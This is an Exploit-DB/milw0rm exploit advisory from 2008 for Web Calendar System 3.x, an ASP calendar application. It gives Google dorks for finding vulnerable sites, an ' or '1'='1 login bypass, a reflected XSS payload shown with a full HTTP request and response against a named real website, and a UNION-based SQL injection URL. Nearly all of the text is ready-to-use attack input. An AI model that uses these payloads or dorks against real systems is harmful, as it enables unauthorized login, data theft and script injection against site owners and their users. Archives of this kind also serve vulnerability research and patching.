Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection

EDB-ID:

7265

CVE:

N/A




Platform:

PHP

Date:

2008-11-28


000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000



[+] Script               : Web Calendar System v 3.22/3.40/3.05/3.23

[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit+Remote SQL Injection )

[+] Google Dork          : intitle:Web Calendar system v 3.40        inurl:.asp
[+] Google Dork          : intitle:Web Calendar system v 3.22        inurl:.asp
[+] Google Dork          : intitle:Web Calendar system v 3.23        inurl:.asp
[+] Google Dork          : intitle:Web Calendar system v 3.05        inurl:.asp

[+] Contact              : blackbeard-sql @ hotmail.fr \\ Damn u crawlers :s


--//--> Exploit : 

1) Remote Bypass Exploit :

http://[website]/[script]/calendar.asp?DoAction=USER&Change=LOGINFORM

username:' or '1'='1

password:' or '1'='1

2) Remote XSS exploit : 

http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search

POST /Calendar/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search HTTP/1.1
Host: www.southforkwatershed.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search
Cookie: ASPSESSIONIDSABBQBTD=MMPLNBODFDNEKLCLBECLLJOC
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
SText=%3Cscript%3Ealert%28%27XSSed%27%29%3C%2Fscript%3E


HTTP/1.x 200 OK
Cache-Control: no-cache
Date: Fri, 28 Nov 2008 11:45:08 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Fri, 28 Nov 2008 11:44:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Encoding: gzip
Vary: Accept-Encoding
Transfer-Encoding: chunked


In simple words :

POST :

SText=<script>alert('Blackbeard is here')</script>

3) Remote SQL injection:

http://[website]/[script]/calendar.asp?DoAction=Calendar&Q_DATE=11/28/2008&View=Event&IDEvent=2824+union+select+1+from+msysobjects

[peace xD]

# milw0rm.com [2008-11-28]